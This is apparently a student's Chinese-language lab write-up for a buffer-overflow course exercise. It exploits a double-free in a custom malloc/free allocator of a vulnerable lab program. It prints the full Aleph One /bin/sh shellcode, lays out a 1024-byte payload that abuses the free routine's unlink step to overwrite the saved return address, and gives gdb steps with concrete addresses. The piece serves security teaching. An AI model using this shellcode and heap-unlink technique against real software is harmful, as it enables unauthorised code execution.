缓冲区溢出实验 4 内存管理（类似于malloc free）

实验环境、代码、及准备

https://www.cnblogs.com/lqerio/p/12870834.html

vul4

观察foo函数，可见问题在于最后一次tfree(q)。由于之前已经tfree了q，现在相当于tfree一个不存在的空间，导致出错。

再看自定义的函数

CHUNK结构体占8个字节（前4个字节为左指针，后4个字节为右指针，分别指向前后的块位置）

在块的r指针的低位部分存储块的状态，1为空闲，0为占用

SET_FREEBIT()函数为将块设置为空闲块

CLR_FREEBIT()函数为将块设置为占用块

GET_FREEBIT()函数为查看块是否为空闲块

RIGHT()函数为当块为空闲块时获取其r指针，即返回右节点

CHUNKSIZE()函数为当前连续空闲块的大小

TOCHUNK()函数为由指针返回CHUNK的头部

FROMCHUNK()函数为由CHUNK返回指针位置

ARENA_CHUNKS 为CHUNK的数目

arena[]为 每个CHUNK的空间

bot 为空间的底部

top 为空间的顶部

Init分配65536字节的chunk数组，bot是数组底部指针，top是数组顶部指针。

Tmalloc分配空间，遍历chunk双链表，找到free且足够大的chunk分配。返回连续的chunk的头部。先找到一个足够大的连续chunk链，chunk链头部标志占用。然后如果chunk链大于需要的空间，在中间截断（选一个块然后标志空闲）。

Tfree函数相当于先把左侧连续的占用的chunk free合并，再把右侧的free，合并。P代表了连续的空闲块的头部。

shellcode（构造过程）

原理是运行/bin/sh 来得到shell，构造过程是将具有运行/bin/sh的C代码转换成有相同功能的机器码。注意代码中用到  0  的地方改成用 xor  eax,eax，这样可以避免复制字符串时遇到/0 中断。

下面的shellcode长度为45字节（不含/0）

/*

* Aleph One shellcode.

*/

static const char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

exploit4

先参考1.4中vul4的分析，

看foo中流程，可知先是p从65536的起始位置（BOT）分配了512字节空间（注意自定义的分配函数  size = sizeof(CHUNK) * ((nbytes+sizeof(CHUNK)-1)/sizeof(CHUNK) + 1);），然后紧接着q分配312字节空间。然后tfree这两块。然后又从BOT分配1024给p。这样第二层分配给p的空间就覆盖第一次的p的空间。根据TOCHUNK（VP

）函数可知他获得的是VP-8字节的内容。

所以q的chunk结构（8字节）对应  obsd_strlcpy(p, arg, 1024);的504-512字节。

利用tfree(p)的过程，将q的右节点设置为存放ret地址的地址，左节点设置为payload起始地址，这里设置为foo中p节点的地址（1024字节的起始位置）。

此时因为刚刚分配了1024空间，foo中p节点的标志位为0（占用），需要通过payload修改为1（空闲），也就是payload的4-8字节（对应foo中p的reght指针）最低位修改为1.

然后进入tfree第一个if，过程为

q->s.r      = p->s.r;  // 设置foo中p的s.r为foo的存放ret的地址

p->s.r->s.l = q;//将ret的地址的连续的8字节当做了chunk结构，恰好修改了ret地址位payload起始地址（foo中p的地址）

此时可以写出第一个payload=40*nop+45shellcode+419*nop+payload地址（foo中p的地址）+存放ret的地址（ebp+4）+512*nop=1024字节。

然后修改foo中p的right指针标志位为1标记空闲（*（int*）（payload+4）=-1））设置为111111111.

然后遇到了问题，payload跳转到其他位置。Gdb查看payload，发现有call指令。

然后修改为payload2

只修改foo中p的right的最低一位为1，即00000001.然后加一个jmp指令向后跳，跳过可能的call指令。Jmp对应机器码\xeb。注意jmp的机器码后需要有jmp的偏移量，可以设置为12。

现在只需要获得foo中p的地址和存放ret的地址。存放ret的地址可以先print ebp然后+4就得到

先按照上述格式填写payload，地址先随便填

Gdb /tmp/vul4

Disas foo

得到最后一个tfree的地址 0x0804862e

Gdb -e exploit4  -s  /tmp/vul4

Catch exec

R

Break foo

C

Ni

Break *0x804862e

Print $ebp

Print p

所以payload中地址：

P=0x804a068

Ret的地址=0xbffffa5c+4=0xbffffa60

运行结果